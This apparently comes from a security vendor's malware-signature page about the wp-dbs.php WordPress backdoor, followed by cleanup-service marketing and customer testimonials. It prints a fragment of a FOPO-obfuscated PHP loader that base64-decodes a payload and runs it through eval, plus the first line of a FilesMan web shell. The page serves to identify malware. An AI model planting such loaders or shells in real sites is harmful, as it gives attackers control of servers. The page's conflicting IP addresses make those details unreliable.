The wp-dbs.php backdoor is know to infect WordPress websites by adding malicious PHP files to the server, allowing hackers to modify files on the server, running server commands, database queries etc.
A free PHP obfuscation tool called FOPO has been used to hide the code from malware and virus scanners. One of the recent variants of this malware is known to be created on Saturday, March 31st, 2018 at 17:12 UTC from IP 18.104.22.168
Details for 22.214.171.124
- IP: 126.96.36.199
- Hostname: tor.slashsrv.com
- ISP: Iomart Hosting Limited
- Organization: RapidSwitch
- Services: Confirmed proxy server, Tor exit node
- Recently reported forum spam source. (207)
<?php /* Obfuscation provided by FOPO - Free Online PHP Obfuscator: http://www.fopo.com.ar/ This code was created on Saturday, March 31st, 2018 at 17:12 UTC from IP 188.8.131.52 Checksum: 2c1447b5c382300091d258ccc7739863cf112199 */ $lc19ce2f="\x62\141\163\145\66\x34\137\144\145\143\157\x64\145";@eval($lc19ce2f( "Ly9OTitOOFUva0ZWT2ZXWlhNWWFCRU5jdkM3N3JleDBUd0c1c25wOTZIdWdkRERuZ2VoZ0RTSWlrWlJ iNk5OeVpic05VTDdtMGhJTXo5NVFuZDRCQitGSkJNS0V6V3NtZ2hvd2R3anptSzYweFkvTUVIbnJLdHp qWWEwZWZmQ1ppUmp2UmRxbDJTN1VhdGFSTmFob0Q1OS9FRjk5NVRxTXQ1K3Z6ZzBZeDVURzFoQ0owOTV
<?php $color = "#df5"; $default_action = 'FilesMan'; $default_use_ajax = true; $default_charset = 'UTF-8';
Website Malware Cleanup
Have you been hacked? Do you need help with fixing your website? We provide professional malware cleanup services to get your business back online quickly.
Removal of Security Warnings
If your website is hacked, your visitors may be shown a warning message. Astra will take the necessary steps to remove your website from the blacklists ASAP.
Website Firewall (WAF)
Stop future website hacks with Astra WAF & protect your website. No hassle out-of-the-box security tailored to your technology stack & CMSs like WordPress, Magento, Opencart etc.
Real Human Support
Astra's team of security engineers guide you through your security journey. We believe in customers first, so no waiting in long queues to get your queries answered.
Astra saved my WordPress site from the dreaded Japanese SEO hack. Ever since I am super happy with their effort. The team is always super helpful, super quick to resolve any issues as well as friendly!
Ingrid Kjelling Photography
Excellent chat support and service! Quick Installation, Clear and Concise Dashboard.Everything is being taken care of extremely fast. My website is well secured.
As Astra is included in all Themecloud plans. It has become a reason for potential customers to choose Themecloud over its competitors as Themecloud offers security protection out of the box.
They are an amazing bunch of people who know what they are doing. I would recommend them for the security of your website especially like ecommerce.
Amazing product and probably the best customer service I have ever experienced. Highly recommended!
We are highly impressed with the prompt service and level of professionalism Astra showed. Human customer support 24x7. They go the extra mile for their customer, Legends.
Security is a critical topic for web sites. Feels good to know you are protected by professionals. Very easy to use. Great human support 24x7. Genuine Pricing.
Great reasonable price. Clear communication and friendly support. The installation, scans, and customer service have all been exceptional.
Surge Marketing Inc
Excellent product and the fastest service I ever experienced. These guys know their tools. Our e-commerce store's delivery became smooth and fast. They provide highly professional service.
Laszlo Pal Katai
I strongly recommend Astra Security to everyone who use OpenCart. It keeps bad guys away. My page was affected by Japanese character hack, and they cleaned it up really fast. Great support and features.
Etnomat - Världens mat till din dörr
The best service I have ever had. I came because of a Japanese SEO hack that I had to my site, they took care of it in no time and made sure hackers never come back again. Highly recommended.
Why are only 5 stars available! Astra secured our site and we are more than satisfied with the work they did. Great and prompt support. Astra team go extra mile for their customers.
Very good service & fast response. My website was cleaned within a few hours. I could check security status of my website on their dashboard. Big thumbs up from Modelers-Heaven who is back in business
Kurt Van Breda
Never thought security could be this simple. Astra team fixed both my hacked websites within a few hours. Thousands of attacks are stopped by Astra every week for me !
"Sun Tzu's The Art of War"
Great support! The team at Astra immediately addressed all my concerns and our website was secured within minutes. I'd definitely recommend to others.
Astra has been a great addition to my website. It has maintained the utmost level of security with great ease of use. The team has been a delight to work with and I would strongly recommend!
CEO & Founder
Astra is the reason we can go to sleep with our websites. We signed up for Astra when we got hacked & everything was resolved. Such incidents did not happen again & we are a step ahead of the potential threats.
Senior Product Engineer
To extend our membership of the Dutch 'Thuiswinkel Waarborg', we chose Astra for securing our site. I want to compliment the Astra team for their quick response & great service.
Astra's Technical Support is the best I've experienced in my life! The installation was extremely smooth and fast. I give Astra a Perfect 10! Needless to say I will be recommending Astra quite often.
John R. Martinson Jr.
Founder & CTO
This information is provided as part of the Astra community project. All information should be considered as-is, without guarantees. All product names, logos, and brands are property of their respective owners. All company, product and service names used in this website are for identification purposes only. Use of these names, logos, and brands does not imply endorsement.If you are an owner of some content and want it to be removed, please mail to [email protected]